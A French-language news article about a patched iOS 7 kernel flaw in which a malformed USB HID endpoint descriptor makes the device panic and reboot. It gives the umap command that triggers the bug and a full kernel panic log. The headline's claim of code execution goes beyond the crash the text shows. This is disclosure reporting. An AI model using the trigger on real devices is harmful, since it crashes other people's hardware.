Une faille dans iOS 7 a permis l'exécution de code arbitraire en mode noyau, provoquant le redémarrage de l'iPhone, Apple publie un correctif

Alors que tous les regards sont tournés vers le lancement futur d’iOS 8, un chercheur en sécurité a découvert une faille à haut risque dans le système d’exploitation actuel fonctionnant sur les appareils iPhone, iPad et iPod Touch. Selon la preuve de concept soumise par le chercheur en sécurité Andy Davis, il a découvert une faille dans iOS 7 qui permet l’exécution de code arbitraire à haut risque en mode noyau. Une fois ce code exécuté, le noyau de l’appareil iOS panique et redémarre.

• *

Andy a soumis la preuve de concept à Apple Inc le 26 septembre 2013 et enfin, le 10 mars 2014, Apple a publié un correctif pour atténuer cette faille. L’intégralité du code est disponible sur Github. Voici un bref aperçu de l’exécution :

Description de la vulnérabilité

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Lorsque une valeur spécifique est fournie dans le descripteur de point de terminaison USB pour un appareil HID

le noyau de l’appareil Apple panique et redémarre

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Détails techniques

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Le bug peut être déclenché en utilisant umap (https://github.com/nccgroup/umap)

comme suit :

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

Identifiant de l’incident : F0856C91-7616-4DAC-9907-C504401D9951

Clé CrashReporter : 7ed804add6a0507b6a8ca9625f0bcd14abc6801b

Modèle matériel : iPhone3,1

Date/Heure : 2013-09-26 12:35:46.892 +0100

Version OS : iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,

fault_addr=0x28

r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe

r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78

r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001

r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8

cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Message du débogueur : panic

Version OS : 11A465

Version du noyau : Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;

root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X

iBoot version : iBoot-1940.1.75

boot sécurisé ? : OUI

Version du journal de panique : 1

Glissement du noyau : 0x0000000008200000

Base de texte du noyau : 0x88201000

Temps d’époque : sec usec

Démarrage : 0x52441b69 0x00000000

Veille : 0x00000000 0x00000000

Réveil : 0x00000000 0x00000000

Calendrier : 0x52441bb5 0x00056497

Tâche en panique 0x896f8d48 : 12856 pages, 114 threads : pid 0 : kernel_task
thread en panique : 0x8023de90, backtrace : 0x87ff3a48
lr : 0x88317889 fp : 0x87ff3a7c
lr : 0x883181f7 fp : 0x87ff3ab0
lr : 0x882b783b fp : 0x87ff3ad4
lr : 0x882220a5 fp : 0x87ff3ba0
lr : 0x8821c7c4 fp : 0x87ff3d78
lr : 0x88af8687 fp : 0x87ff3da8
lr : 0x8828b5bd fp : 0x87ff3dd0
lr : 0x889d6d29 fp : 0x87ff3df0
lr : 0x889da2f3 fp : 0x87ff3e18
lr : 0x8828b5bd fp : 0x87ff3e40
lr : 0x889da14f fp : 0x87ff3e7c
lr : 0x88acb8e7 fp : 0x87ff3eb8
lr : 0x88ac9815 fp : 0x87ff3ed4
lr : 0x884b24d3 fp : 0x87ff3f60
lr : 0x882cf869 fp : 0x87ff3fa8
lr : 0x8821f05c fp : 0x00000000

Apple a donné à cette faille le numéro de référence 600217059 et a publié un correctif pour atténuer la vulnérabilité, qui peut être téléchargé ici.

• *

Ressource : CXSECURITY